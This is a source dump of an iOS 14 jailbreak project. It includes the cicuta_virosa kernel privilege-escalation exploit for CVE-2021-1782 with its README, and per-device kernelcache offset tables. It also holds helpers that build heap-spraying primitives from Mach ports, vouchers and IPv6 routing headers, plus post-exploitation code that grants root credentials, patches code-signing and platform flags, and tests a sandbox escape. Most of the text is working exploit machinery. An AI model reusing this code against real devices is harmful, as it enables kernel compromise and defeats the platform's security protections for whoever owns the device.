    OFFSET(task, itk_space) = 0x330;
    OFFSET(task, bsd_info) = 0x390;
    OFFSET(task, t_flags) = 0x3d8;
}
69 |
/*
 * iPhone 12 (D53GAP), build 18A8395: baseline offsets plus this build's
 * kernelcache addresses. The trailing hex comments are not explained in
 * this file.
 */
static void offsets_iPhone12_18A8395() {
    offsets_base_iOS_14_x();

    kc_kernel_map = 0xFFFFFFF0077F2620; // 0x3C88
    kc_kernel_task = 0xFFFFFFF0077EE998; // 0x3C88
    kc_IOSurfaceClient_vt = 0xFFFFFFF007951D28; // 0xE59E40
    kc_IOSurfaceClient_vt_0 = 0xFFFFFFF0087ABB68; // 0xE59E40
}
78 |
/* iPhone 11 (N104AP), build 18A373: baseline offsets plus this build's
 * kernelcache addresses. */
static void offsets_iPhone11_18A373() {
    offsets_base_iOS_14_x();

    kc_kernel_map = 0xFFFFFFF0076DA618; // 0x3C80
    kc_kernel_task = 0xFFFFFFF0076D6998; // 0x3C80
    kc_IOSurfaceClient_vt = 0xFFFFFFF00783CDA8; // 0xE3D9D0
    kc_IOSurfaceClient_vt_0 = 0xFFFFFFF00867A778; // 0xE3D9D0
}
87 |
/* iPhone 12 Pro (D53pAP), build 18C66: baseline offsets plus this build's
 * kernelcache addresses. */
static void offsets_iPhone12pro_18C66() {
    offsets_base_iOS_14_x();

    kc_kernel_map = 0xFFFFFFF0076C8918; // 0x3C98
    kc_kernel_task = 0xFFFFFFF0076C4C80; // 0x3C98
    kc_IOSurfaceClient_vt = 0xFFFFFFF0078262A0; // 0xE968B4
    kc_IOSurfaceClient_vt_0 = 0xFFFFFFF0086BCB54; // 0xE968B4
}
96 |
/* iPad Air 4 (J307AP), build 18C66: baseline offsets plus this build's
 * kernelcache addresses. */
static void offsets_iPad4air_18C66() {
    offsets_base_iOS_14_x();

    kc_kernel_map = 0xFFFFFFF0076C0918; // 0x3C98
    kc_kernel_task = 0xFFFFFFF0076bCC80; // 0x3C98
    kc_IOSurfaceClient_vt = 0xFFFFFFF007898050; // 0x10AB36C
    kc_IOSurfaceClient_vt_0 = 0xFFFFFFF0089433BC; // 0x10AB36C
}
105 |
/* iPad 8 (J171aAP), build 18B92: baseline offsets plus this build's
 * kernelcache addresses. */
static void offsets_iPad8_18B92() {
    offsets_base_iOS_14_x();

    kc_kernel_map = 0xFFFFFFF0076a8908; // 0x3C88
    kc_kernel_task = 0xFFFFFFF0076a4c80; // 0x3C88
    kc_IOSurfaceClient_vt = 0xFFFFFFF0077f9b10; // 0x10AB36C
    kc_IOSurfaceClient_vt_0 = 0xFFFFFFF008620f74; // 0x10AB36C
}
114 |
/* iPhone 11 (N104AP), build 18B92: baseline offsets plus this build's
 * kernelcache addresses (second iPhone 11 table; see devices[]). */
static void offsets_iPhone11_18B92() {
    offsets_base_iOS_14_x();

    kc_kernel_map = 0xfffffff0076fc910;
    kc_kernel_task = 0xfffffff0076f8c80;
    kc_IOSurfaceClient_vt = 0xfffffff00785d7f8;
    kc_IOSurfaceClient_vt_0 = 0xfffffff0086dacdc;
}
123 |
/* One supported device/build combination (see devices[] below). */
struct device_def {
    const char *name;    // human-readable label, not used for matching
    const char *model;   // compared with g_exp.model via strcmp
    const char *build;   // compared with g_exp.osversion via strcmp
    void (*init)(void);  // offset table to apply on a match
};
130 |
/*
 * Supported device/build combinations. kernel_offsets_init() matches
 * g_exp.model and g_exp.osversion against `model` and `build` with strcmp,
 * so both strings must match exactly, including case.
 *
 * NOTE(review): "J171aAP" (iPad 8) is the only model string containing a
 * lowercase letter — confirm it is the exact string the device reports.
 * "iPhone 11" / N104AP appears twice, once per build (18A373, 18B92).
 */
static struct device_def devices[] = {
    { "iPad Air 4", "J307AP", "18C66", offsets_iPad4air_18C66 },
    { "iPad 8", "J171aAP", "18B92", offsets_iPad8_18B92 },
    { "iPhone 6s", "N71AP", "18A373", offsets_iPhone6s_18A373 },
    { "iPhone 11", "N104AP", "18A373", offsets_iPhone11_18A373 },
    { "iPhone 12", "D53GAP", "18A8395", offsets_iPhone12_18A8395 },
    { "iPhone 12 pro", "D53pAP", "18C66", offsets_iPhone12pro_18C66 },
    { "iPhone 11", "N104AP", "18B92", offsets_iPhone11_18B92 }
};
140 |
/*
 * Select and apply the offset table for the running device.
 *
 * Walks devices[] and runs the init callback of the first entry whose
 * model and build strings are exactly equal (case-sensitive strcmp) to
 * g_exp.model and g_exp.osversion. When nothing matches, fail_info() is
 * called with the original message; arrayn(), g_exp and fail_info() are
 * project definitions not visible here.
 */
void kernel_offsets_init(void) {
    struct device_def *end = devices + arrayn(devices);

    for (struct device_def *dev = devices; dev < end; ++dev) {
        int model_matches = strcmp(g_exp.model, dev->model) == 0;
        int build_matches = strcmp(g_exp.osversion, dev->build) == 0;
        if (model_matches && build_matches) {
            dev->init();
            return;
        }
    }

    fail_info(("no device defination"));
}
151 |
--------------------------------------------------------------------------------
/manticore/Exploit/cicuta/README.md:
--------------------------------------------------------------------------------
1 | # cicuta_virosa
2 | iOS\iPadOS 14.3 kernel LPE for all devices by **@ModernPwner**. Please follow us on twitter :)
3 |
4 | # Current state
5 | - Exploit works :)
6 | - Needs a lot of cleanup + more stable primitives that do not rely on memory reallocation. **Use it at your own risk**
7 | - Exploit will take more than 2 minutes because we can't understand how to properly bypass one stupid sanity check in the kernel on "Stage 3: Convert uaf into pktopts uaf" (we'll fix it soon)
8 | - Reliability is amazing on our A13 and A10 devices
9 |
10 | # The vuln
11 | **CVE-2021-1782**: A race condition in user_data_get_value() leading to ivac entry uaf. This issue has been actively exploited in the wild with the WebKit exploit. We might release this RCE chain in the future.
12 |
13 | # Writeup
14 | Soon.
15 |
16 | # How to build it
17 | We don't like to commit Xcode project files. Create your own Xcode project, add the files and call the "cicuta_virosa" function.
18 |
19 | # Credits
20 | - Some utils (exploit_utilities.c): @Jakeashacks
21 | - Vuln: Apple
22 |
23 | # License
24 | If you want to use it in your project under a GPL-incompatible license - **please** DM us to get permission.
25 | We give permissions to **@CStar_OW** to use and modify the exploit for Odyssey - the best jailbreak :).
26 | But we hope that all modifications will be open sourced.
27 |
28 | # PAC bypass
29 | For the moment we have a brand new technique to bypass PAC but we decided to not include such critical stuff here.
30 | **Maybe** we'll post a PAC bypass along with the iOS 14.5 exploit. This is in progress, we **may** publish 14.5 exploit after Apple patch.
31 |
--------------------------------------------------------------------------------
/manticore/Exploit/cicuta/cicuta_log.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 |
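/*
 * printf-style logger: formats the message, prints it to stdout followed
 * by a newline and releases the temporary buffer.
 *
 * format: printf format string; the remaining arguments must match it.
 *
 * Fix: the original ignored the vasprintf() result, so on allocation failure
 * it passed a NULL `msg` to printf("%s"). A copy of the argument list is now
 * kept so the message can still be emitted with vprintf() in that case.
 */
void cicuta_log(const char* format, ...)
{
    char *msg = NULL;
    va_list ap, ap_copy;
    va_start(ap, format);
    va_copy(ap_copy, ap);

    int len = vasprintf(&msg, format, ap);
    if (len < 0 || msg == NULL) {
        /* formatting buffer unavailable: print directly instead of dropping the line */
        vprintf(format, ap_copy);
        putchar('\n');
    } else {
        printf("%s\n", msg);
        free(msg);
    }

    va_end(ap_copy);
    va_end(ap);
}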
15 |
--------------------------------------------------------------------------------
/manticore/Exploit/cicuta/descriptors_utils.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 |
/*
 * Set the soft RLIMIT_NOFILE of the calling process to `limit`, keeping the
 * hard limit as reported by getrlimit(). Both return values are ignored, so
 * a request above the hard limit silently leaves the limit unchanged.
 */
void increase_limits(uint32_t limit)
{
    struct rlimit nofile = { .rlim_cur = 0, .rlim_max = 0 };

    (void)getrlimit(RLIMIT_NOFILE, &nofile);
    nofile.rlim_cur = (rlim_t)limit;
    (void)setrlimit(RLIMIT_NOFILE, &nofile);
}
11 |
--------------------------------------------------------------------------------
/manticore/Exploit/cicuta/exploit_utilities.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 |
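/*
 * Allocate a Mach receive right, add a send right to it and raise its queue
 * limit to MACH_PORT_QLIMIT_LARGE.
 *
 * Returns the port name, or MACH_PORT_NULL after logging with cicuta_log()
 * if any step fails; a port created before a later failure is destroyed.
 *
 * Fix: the original never stored the result of mach_port_insert_right(), so
 * the check that followed re-tested the (successful) allocate result and an
 * insertion failure went unnoticed.
 */
mach_port_t cv_new_mach_port() {
    mach_port_t port = MACH_PORT_NULL;
    kern_return_t ret = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port);
    if (ret != KERN_SUCCESS) {
        cicuta_log("[-] failed to allocate port.");
        return MACH_PORT_NULL;
    }

    ret = mach_port_insert_right(mach_task_self(), port, port, MACH_MSG_TYPE_MAKE_SEND);
    if (ret != KERN_SUCCESS) {
        cicuta_log("[-] failed to insert right.");
        mach_port_destroy(mach_task_self(), port);
        return MACH_PORT_NULL;
    }

    mach_port_limits_t limits = {0};
    limits.mpl_qlimit = MACH_PORT_QLIMIT_LARGE;
    ret = mach_port_set_attributes(mach_task_self(), port, MACH_PORT_LIMITS_INFO,
                                   (mach_port_info_t)&limits, MACH_PORT_LIMITS_INFO_COUNT);
    if (ret != KERN_SUCCESS) {
        cicuta_log("[-] failed to increase queue limit.");
        mach_port_destroy(mach_task_self(), port);
        return MACH_PORT_NULL;
    }

    return port;
}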
31 |
32 |
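/*
 * Same as cv_new_mach_port() but reports failures with printf(): allocate a
 * receive right, add a send right, raise the queue limit to
 * MACH_PORT_QLIMIT_LARGE.
 *
 * Returns the port name, or MACH_PORT_NULL on failure (destroying the port
 * if it had already been allocated).
 *
 * Fix: the result of mach_port_insert_right() is now assigned to `ret`; the
 * original dropped it, so that failure path could never trigger.
 */
mach_port_t new_mach_port() {
    mach_port_t port = MACH_PORT_NULL;
    kern_return_t ret = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port);
    if (ret != KERN_SUCCESS) {
        printf("[-] failed to allocate port.\n");
        return MACH_PORT_NULL;
    }

    ret = mach_port_insert_right(mach_task_self(), port, port, MACH_MSG_TYPE_MAKE_SEND);
    if (ret != KERN_SUCCESS) {
        printf("[-] failed to insert right.\n");
        mach_port_destroy(mach_task_self(), port);
        return MACH_PORT_NULL;
    }

    mach_port_limits_t limits = {0};
    limits.mpl_qlimit = MACH_PORT_QLIMIT_LARGE;
    ret = mach_port_set_attributes(mach_task_self(), port, MACH_PORT_LIMITS_INFO,
                                   (mach_port_info_t)&limits, MACH_PORT_LIMITS_INFO_COUNT);
    if (ret != KERN_SUCCESS) {
        printf("[-] failed to increase queue limit.\n");
        mach_port_destroy(mach_task_self(), port);
        return MACH_PORT_NULL;
    }

    return port;
}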
59 |
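/*
 * Send `size` bytes of `buffer` as the inline payload of a simple Mach
 * message to `destination` (no reply port, MAKE_SEND disposition).
 *
 * Returns KERN_SUCCESS, or the mach_msg() error after logging; on a send
 * failure the original behaviour of destroying `destination` is kept.
 * Returns KERN_RESOURCE_SHORTAGE if the message buffer cannot be allocated
 * (the original dereferenced a NULL malloc result).
 *
 * struct simple_msg comes from a project header; `buf` is assumed to be its
 * trailing payload area.
 */
kern_return_t send_message(mach_port_t destination, void *buffer, mach_msg_size_t size) {
    mach_msg_size_t msg_size = sizeof(struct simple_msg) + size;
    struct simple_msg *msg = malloc(msg_size);
    if (msg == NULL) {
        cicuta_log("[-] failed to allocate message buffer.");
        return KERN_RESOURCE_SHORTAGE;
    }

    memset(msg, 0, sizeof(struct simple_msg));   /* header only; payload copied below */

    msg->hdr.msgh_remote_port = destination;
    msg->hdr.msgh_local_port = MACH_PORT_NULL;
    msg->hdr.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, 0);
    msg->hdr.msgh_size = msg_size;

    memcpy(&msg->buf[0], buffer, size);

    kern_return_t ret = mach_msg(&msg->hdr, MACH_SEND_MSG, msg_size, 0, MACH_PORT_NULL, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
    free(msg);
    if (ret != KERN_SUCCESS) {
        cicuta_log("[-] failed to send message.");
        mach_port_destroy(mach_task_self(), destination);
        return ret;
    }
    return KERN_SUCCESS;
}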
83 |
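/*
 * Block on `source` for one message with a payload of at most `size` bytes
 * and return the heap-allocated message; the caller frees it.
 *
 * Returns NULL after logging if mach_msg() fails or the buffer cannot be
 * allocated. Fix: the original leaked the buffer on a receive failure and
 * did not check malloc().
 */
struct simple_msg* receive_message(mach_port_t source, mach_msg_size_t size) {
    mach_msg_size_t msg_size = sizeof(struct simple_msg) + size;
    struct simple_msg *msg = malloc(msg_size);
    if (msg == NULL) {
        cicuta_log("[-] failed to allocate receive buffer.");
        return NULL;
    }
    memset(msg, 0, sizeof(struct simple_msg));   /* header only, as before */

    kern_return_t ret = mach_msg(&msg->hdr, MACH_RCV_MSG, 0, msg_size, source, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
    if (ret != KERN_SUCCESS) {
        cicuta_log("[-] failed to receive message: 0x%x (%s).", ret, mach_error_string(ret));
        free(msg);
        return NULL;
    }

    return msg;
}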
97 |
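/*
 * Send one complex Mach message to `where` carrying an out-of-line port
 * descriptor with `count` copies of `target_port` under `disposition`
 * (message id fixed at 0x41414141, physical copy, no deallocate).
 *
 * Returns 0 on success and KERN_FAILURE after logging if mach_msg() fails.
 * Fix: a negative `count` (which would wrap the malloc size) and allocation
 * failures now also return KERN_FAILURE instead of dereferencing NULL.
 *
 * struct ool_msg comes from a project header.
 */
int send_ool_ports(mach_port_t where, mach_port_t target_port, int count, int disposition) {
    kern_return_t ret;

    if (count < 0) {
        cicuta_log("[-] Invalid OOL port count: %d.", count);
        return KERN_FAILURE;
    }

    mach_port_t* ports = malloc(sizeof(mach_port_t) * (size_t)count);
    struct ool_msg* msg = (struct ool_msg*)calloc(1, sizeof(struct ool_msg));
    /* malloc(0) may legitimately return NULL, so only treat NULL as failure when count > 0 */
    if ((count > 0 && ports == NULL) || msg == NULL) {
        cicuta_log("[-] Failed to allocate OOL message.");
        free(msg);
        free(ports);
        return KERN_FAILURE;
    }

    for (int i = 0; i < count; i++) {
        ports[i] = target_port;
    }

    msg->hdr.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, 0);
    msg->hdr.msgh_size = (mach_msg_size_t)sizeof(struct ool_msg);
    msg->hdr.msgh_remote_port = where;
    msg->hdr.msgh_local_port = MACH_PORT_NULL;
    msg->hdr.msgh_id = 0x41414141;

    msg->body.msgh_descriptor_count = 1;

    msg->ool_ports.address = ports;
    msg->ool_ports.count = count;
    msg->ool_ports.deallocate = 0;
    msg->ool_ports.disposition = disposition;
    msg->ool_ports.type = MACH_MSG_OOL_PORTS_DESCRIPTOR;
    msg->ool_ports.copy = MACH_MSG_PHYSICAL_COPY;

    ret = mach_msg(&msg->hdr, MACH_SEND_MSG|MACH_MSG_OPTION_NONE, msg->hdr.msgh_size, 0, MACH_PORT_NULL, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);

    free(msg);
    free(ports);

    if (ret != KERN_SUCCESS) {
        cicuta_log("[-] Failed to send OOL message: 0x%x (%s).", ret, mach_error_string(ret));
        return KERN_FAILURE;
    }

    return 0;
}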
135 |
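/*
 * Alias of send_ool_ports() kept for callers that use this name.
 *
 * The original body duplicated send_ool_ports() line for line (same message
 * layout, same log string, same return values); it now delegates so the two
 * cannot drift apart.
 */
int cv_send_ool_ports(mach_port_t where, mach_port_t target_port, int count, int disposition) {
    return send_ool_ports(where, target_port, count, disposition);
}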
173 |
174 |
--------------------------------------------------------------------------------
/manticore/Exploit/cicuta/fake_element_spray.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 |
5 | #define IPV6_RTHDR 51
6 |
/* Module state set by init_fake_element_spray() and cleared by
 * release_all_fake_element_spray(). */
static uint32_t fake_element_e_size = 0;       // copied into the header by perform_fake_element_spray()
static uint32_t fake_element_spray_count = 0;  // number of sockets / spray iterations
static int* route_header_spray_sockets = NULL; // fake_element_spray_count AF_INET6 UDP sockets
static void* route_header = NULL;              // buffer handed to setsockopt(IPV6_RTHDR)
static uint32_t route_header_size = 0;         // byte size of route_header
12 |
/*
 * Prepare the spray state: open `count` AF_INET6 UDP sockets (each given the
 * IPV6_USE_MIN_MTU option) and build the zero-filled routing-header buffer
 * that perform_fake_element_spray() later passes to setsockopt(IPV6_RTHDR).
 *
 * e_size and count are stored in the module globals. DATA_VOUCHER_CONTENT_SIZE
 * and USER_DATA_ELEMENT_SIZEOF are project constants not visible here.
 *
 * Robustness notes (behaviour unchanged): neither malloc() result is checked,
 * and a failed socket() is only logged — the following setsockopt() then runs
 * on fd -1 and the -1 stays in the table.
 */
void init_fake_element_spray(uint32_t e_size, uint32_t count)
{
    fake_element_e_size = e_size;
    fake_element_spray_count = count;
    route_header_spray_sockets = malloc(fake_element_spray_count * sizeof(int));
    for (uint32_t i = 0; i < fake_element_spray_count; ++i)
    {
        route_header_spray_sockets[i] = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);
        if (route_header_spray_sockets[i] < 0)
        {
            cicuta_log("Cannot create socket at %d. Error: %d", i, errno);
        }
        int minmtu = -1;
        int res = setsockopt(route_header_spray_sockets[i], IPPROTO_IPV6, IPV6_USE_MIN_MTU, &minmtu, sizeof(minmtu));
        if (res != 0)
        {
            cicuta_log("Cannot preallocate pktopts at %d. Error: %d", i, errno);
        }
    }

    // len is the header length in 8-octet units (the ip6r_len field below),
    // rounded down to an even value; the buffer is (len + 1) * 8 bytes.
    int header_size = DATA_VOUCHER_CONTENT_SIZE + USER_DATA_ELEMENT_SIZEOF;
    int len = ((header_size >> 3) - 1) & ~1;
    route_header_size = (len + 1) << 3;
    route_header = malloc(route_header_size);
    memset(route_header, 0, route_header_size);

    // Local copy of the generic IPv6 routing header layout.
    struct ip6_rthdr {
        u_int8_t ip6r_nxt; /* next header */
        u_int8_t ip6r_len; /* length in units of 8 octets */
        u_int8_t ip6r_type; /* routing type */
        u_int8_t ip6r_segleft; /* segments left */
        /* followed by routing type specific data */
    } __attribute__((__packed__));

    struct ip6_rthdr* rthdr = (struct ip6_rthdr *)route_header;
    rthdr->ip6r_nxt = 0;
    rthdr->ip6r_len = len;
    rthdr->ip6r_type = IPV6_RTHDR_TYPE_0;
    rthdr->ip6r_segleft = rthdr->ip6r_len >> 1; // half the length field
}
53 |
/* Replace the stored e_size; takes effect on the next perform_fake_element_spray(). */
void fake_element_spray_set_e_size(uint32_t e_size){
    fake_element_e_size = e_size;
}
57 |
/*
 * Write `pktopts` into 64-bit slot 2 (byte offset 16) of route_header.
 * Requires init_fake_element_spray() to have run — route_header is NULL
 * before that. set_fake_queue_chain_for_fake_element_spray() writes the
 * same slot, so the later call wins.
 */
void fake_element_spray_set_pktopts(uint64_t pktopts){
    uint64_t* fake_element = route_header;
    fake_element[2] = pktopts;
}
62 |
/*
 * Close the spray socket at `index` and mark its slot as -1.
 * No bounds check against fake_element_spray_count; the table must exist.
 */
void release_fake_element_spray_at(uint32_t index){
    close(route_header_spray_sockets[index]);
    route_header_spray_sockets[index] = - 1;
}
67 |
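/*
 * Close every spray socket, free the socket table and the routing-header
 * buffer, and reset the module state to its pre-init values.
 *
 * Fix: the freed pointers are now reset to NULL; the original left them
 * dangling, so a later fake_element_spray_set_pktopts() or a second release
 * would touch freed memory. The socket loop is skipped when the table was
 * never allocated.
 */
void release_all_fake_element_spray(void) {
    if (route_header_spray_sockets != NULL) {
        for (uint32_t i = 0; i < fake_element_spray_count; ++i) {
            release_fake_element_spray_at(i);
        }
    }

    free(route_header_spray_sockets);
    free(route_header);
    route_header_spray_sockets = NULL;
    route_header = NULL;
    fake_element_e_size = 0;
    fake_element_spray_count = 0;
    route_header_size = 0;
}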
79 |
/*
 * Run the spray over all sockets: store fake_element_e_size in the header's
 * second 32-bit word and, per socket, a per-iteration marker
 * (FAKE_ELEMENT_MAGIC_BASE + i, project constant) in the area following the
 * first USER_DATA_ELEMENT_SIZEOF bytes, then apply the header with
 * setsockopt(IPV6_RTHDR). A failing setsockopt() is retried once after a
 * 2 µs sleep; a second failure is ignored (the diagnostic is commented out).
 */
void perform_fake_element_spray(void) {
    ((uint32_t*)route_header)[1] = fake_element_e_size;
    uint64_t* element_content = (uint64_t*)((char*)route_header + USER_DATA_ELEMENT_SIZEOF);
    for (uint32_t i = 0; i < fake_element_spray_count; ++i){
        element_content[0] = FAKE_ELEMENT_MAGIC_BASE + i;
        int res = setsockopt(route_header_spray_sockets[i], IPPROTO_IPV6, IPV6_RTHDR, route_header, route_header_size);
        if (res != 0){
            usleep(2);
            res = setsockopt(route_header_spray_sockets[i], IPPROTO_IPV6, IPV6_RTHDR, route_header, route_header_size);
            if (res != 0){
                // second attempt failed: silently ignored
                // printf("Cannot spray rthdr at %d. Error: %d\n", i, errno);
            }
        }
    }

}
96 |
/*
 * Write `next` and `prev` into 64-bit slots 2 and 3 of route_header
 * (byte offsets 16 and 24). Slot 2 is the same one written by
 * fake_element_spray_set_pktopts(). Requires init_fake_element_spray().
 */
void set_fake_queue_chain_for_fake_element_spray(uint64_t next, uint64_t prev){
    uint64_t* fake_element = route_header;
    fake_element[2] = next;
    fake_element[3] = prev;
}
102 |
--------------------------------------------------------------------------------
/manticore/Exploit/cicuta/voucher_utils.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 |
/* Host port cached by create_voucher() on first use (MACH_PORT_NULL until then). */
host_name_port_t host = MACH_PORT_NULL;
6 |
/*
 * Thin wrapper around host_create_mach_voucher(). The host port is fetched
 * once and cached in the global `host`; the recipe length passed to the
 * kernel is the fixed recipe header plus recipe->content_size.
 */
kern_return_t create_voucher(mach_voucher_attr_recipe_t recipe, ipc_voucher_t* voucher) {
    if (host == MACH_PORT_NULL) host = mach_host_self();

    mach_msg_type_number_t recipe_size =
        (mach_msg_type_number_t)(sizeof(*recipe) + recipe->content_size);

    return host_create_mach_voucher(host,
                                    (mach_voucher_attr_raw_recipe_array_t)recipe,
                                    recipe_size,
                                    voucher);
}
14 |
/*
 * Build a user-data recipe for `id`, create the voucher from it and free
 * the recipe again. Returns the create_voucher() result.
 * create_recipe_for_user_data_voucher() is defined further down this file.
 */
kern_return_t create_user_data_voucher_fast(uint64_t id, ipc_voucher_t* voucher){
    mach_voucher_attr_recipe_t recipe = create_recipe_for_user_data_voucher(id);
    const kern_return_t kr = create_voucher(recipe, voucher);
    free(recipe);  // the recipe is only needed for the call above
    return kr;
}
21 |
/*
 * Build a MACH_VOUCHER_ATTR_USER_DATA_STORE recipe whose content is
 * DATA_VOUCHER_CONTENT_SIZE bytes: a fixed marker in the first 8 bytes and
 * `id` in the next 8. The caller frees the result (see
 * create_user_data_voucher_fast()).
 *
 * Robustness notes (behaviour unchanged): malloc() is not checked, and only
 * the recipe header is zeroed — any content bytes beyond the first 16 are
 * uninitialised heap memory when the recipe is handed to the kernel.
 * DATA_VOUCHER_CONTENT_SIZE is a project constant (assumed >= 16 here).
 */
mach_voucher_attr_recipe_data_t* create_recipe_for_user_data_voucher(uint64_t id){
    mach_voucher_attr_recipe_t recipe = malloc(sizeof(mach_voucher_attr_recipe_data_t) + DATA_VOUCHER_CONTENT_SIZE);
    memset(recipe, 0, sizeof(mach_voucher_attr_recipe_data_t));
    recipe->key = MACH_VOUCHER_ATTR_KEY_USER_DATA;
    recipe->command = MACH_VOUCHER_ATTR_USER_DATA_STORE;
    recipe->content_size = DATA_VOUCHER_CONTENT_SIZE;
    uint64_t* content = (uint64_t*)recipe->content;
    content[0] = 0x4141414141414141;
    content[1] = id;
    return recipe;
}
33 |
/* Release the voucher's port name in the current task. */
kern_return_t destroy_voucher(mach_port_t voucher){
    return mach_port_destroy(mach_task_self(), voucher);
}
37 |
--------------------------------------------------------------------------------
/manticore/Info.plist:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | CFBundleDevelopmentRegion
6 | $(DEVELOPMENT_LANGUAGE)
7 | CFBundleDisplayName
8 | Manticore
9 | CFBundleExecutable
10 | $(EXECUTABLE_NAME)
11 | CFBundleIdentifier
12 | $(PRODUCT_BUNDLE_IDENTIFIER)
13 | CFBundleInfoDictionaryVersion
14 | 6.0
15 | CFBundleName
16 | $(PRODUCT_NAME)
17 | CFBundlePackageType
18 | $(PRODUCT_BUNDLE_PACKAGE_TYPE)
19 | CFBundleShortVersionString
20 | $(MARKETING_VERSION)
21 | CFBundleVersion
22 | $(CURRENT_PROJECT_VERSION)
23 | LSRequiresIPhoneOS
24 |
25 | UIApplicationSupportsIndirectInputEvents
26 |
27 | UILaunchStoryboardName
28 | LaunchScreen
29 | UIMainStoryboardFile
30 | Main
31 | UIRequiredDeviceCapabilities
32 |
33 | armv7
34 |
35 | UISupportedInterfaceOrientations
36 |
37 | UIInterfaceOrientationPortrait
38 | UIInterfaceOrientationLandscapeLeft
39 | UIInterfaceOrientationLandscapeRight
40 |
41 | UISupportedInterfaceOrientations~ipad
42 |
43 | UIInterfaceOrientationPortrait
44 | UIInterfaceOrientationPortraitUpsideDown
45 | UIInterfaceOrientationLandscapeLeft
46 | UIInterfaceOrientationLandscapeRight
47 |
48 |
49 |
50 |
--------------------------------------------------------------------------------
/manticore/Jailbreak/jailbreak.mm:
--------------------------------------------------------------------------------
1 | //
2 | // jailbreak.m
3 | // reton
4 | //
5 | // Created by Luca on 15.02.21.
6 | //
7 |
8 | #include "ViewController.h"
9 | #include
10 | #include
11 | #include
12 | #include
13 | #include
14 | #include
15 | #include
16 | #include
17 | #include
18 | #include
19 | #include
20 | #include
21 | #include
22 | #include
23 | #include
24 | #include
25 | #include
26 | #include
27 | #include
28 | #include
29 |
// Bundle-relative resource root; jailb_root is not referenced in the visible part of this file.
#define JAILB_ROOT "/private/var/containers/Bundle/jb_resources/"
static const char *jailb_root = JAILB_ROOT;
// Local definition of the arm64e subtype used by IS_PAC; expected to agree with <mach/machine.h>.
#define CPU_SUBTYPE_ARM64E ((cpu_subtype_t) 2)
33 |
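/*
 * Query hw.cpusubtype via sysctlbyname().
 *
 * Returns the reported cpu_subtype_t, or 0 if the sysctl fails. Compared
 * with CPU_SUBTYPE_ARM64E by the IS_PAC macro below.
 *
 * Fix: the original heap-allocated both the value and its size, never freed
 * either, and passed sizeof(cpu_subtype_size) — the size of a pointer — as
 * the buffer length instead of sizeof(cpu_subtype_t). Stack locals with the
 * correct size replace that; the result is unchanged on success.
 */
cpu_subtype_t get_cpu_subtype() {
    cpu_subtype_t subtype = 0;
    size_t subtype_size = sizeof(subtype);
    if (sysctlbyname("hw.cpusubtype", &subtype, &subtype_size, NULL, 0) != 0) {
        return 0;
    }
    return subtype;
}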
47 |
48 | #define IS_PAC (get_cpu_subtype() == CPU_SUBTYPE_ARM64E)
49 |
/*
 * Apply the post-exploitation patches to the current process and return 0.
 * Relies on the kernel r/w helpers and g_exp state populated by the exploit;
 * none of them are defined in this file.
 *
 * Visible sequence: proc_set_root_cred (old_cred is filled but never read
 * again), 100 ms sleep, setuid(0) with perror on failure, patch_TF_PLATFORM,
 * read of proc csflags, prepare_fake_entitlements, self_macf lookup,
 * patch_codesign. csflags_mod is computed and printed but otherwise unused;
 * the bit constants are undocumented here.
 *
 * NOTE(review): "Codessign patched" has no trailing newline, so it runs into
 * "Goodbye!" on the same output line.
 */
extern "C" int jailbreak() {
    printf("* ------- Applying Patches ------- *\n");
    struct proc_cred *old_cred;
    proc_set_root_cred(g_exp.self_proc, &old_cred);
    util_msleep(100);
    int err = setuid(0);
    if (err) perror("setuid");
    patch_TF_PLATFORM(g_exp.self_task);
    uint64_t csflags = read_32(g_exp.self_proc + OFFSET(proc, csflags));
    uint64_t csflags_mod = (csflags|0xA8|0x0000008|0x0000004|0x10000000)&~(0x0000800|0x0000100|0x0000200);
    printf("CS Flags:\t0x%llx | 0x%llx\n", csflags, csflags_mod);
    prepare_fake_entitlements();
    self_macf = proc_fetch_MACF(g_exp.self_proc);
    patch_codesign();
    printf("Codessign patched");
    printf("Goodbye!\n");
    return 0;
}
68 |
/*
 * Probe whether the process can write outside its container by creating
 * /var/mobile/escaped, checking that it exists and removing it again.
 * Returns true if the probe file was observed, false otherwise.
 */
bool check_sandbox_escape(void){
    NSFileManager *fm = [NSFileManager defaultManager];
    NSString *probe = @"/var/mobile/escaped";

    [fm createFileAtPath:probe contents:nil attributes:nil];
    if (![fm fileExistsAtPath:probe]) return false;

    [fm removeItemAtPath:probe error:nil];
    return true;
}
78 |
/* Stub: performs no work and always returns 0. */
int install_bootstrap(void){
    return 0;
}
82 |
/*
 * Set SBShowNonDefaultSystemApps = YES in SpringBoard's preferences plist
 * through modifyPlist() (project helper, not defined here).
 * Returns 1 if modifyPlist() reported success (truthy result), else 0.
 */
int sb_allow_ndefault(void) {
    // Allow SpringBoard to show non-default system apps.
    return modifyPlist(@"/var/mobile/Library/Preferences/com.apple.springboard.plist", ^(id plist) {
        plist[@"SBShowNonDefaultSystemApps"] = @YES;
    }) ? 1 : 0;
}
89 |
/*
 * Ensure /var/mobile/.manticore/ and jailbreak.plist inside it exist.
 *
 * Returns YES immediately when both already exist. Otherwise it creates the
 * directory and then an empty plist via createEmptyPlist() (project helper).
 *
 * NOTE(review): the return values are ambiguous. After a successful
 * first-time setup the function falls through to `return 0` (NO) — the same
 * value the two failure branches return — so callers cannot tell a fresh
 * install from a failure. The "directory exists but plist is missing" case
 * also returns NO without creating the plist. The final `return NO` is
 * unreachable. Confirm the intended contract before changing callers.
 */
bool setup_manticore_filesystem(void){
    NSString *jailbreakDirBasePath = @"/var/mobile/.manticore/";
    NSString *jailbreakPlistPath = [NSString stringWithFormat:@"%@jailbreak.plist", jailbreakDirBasePath];
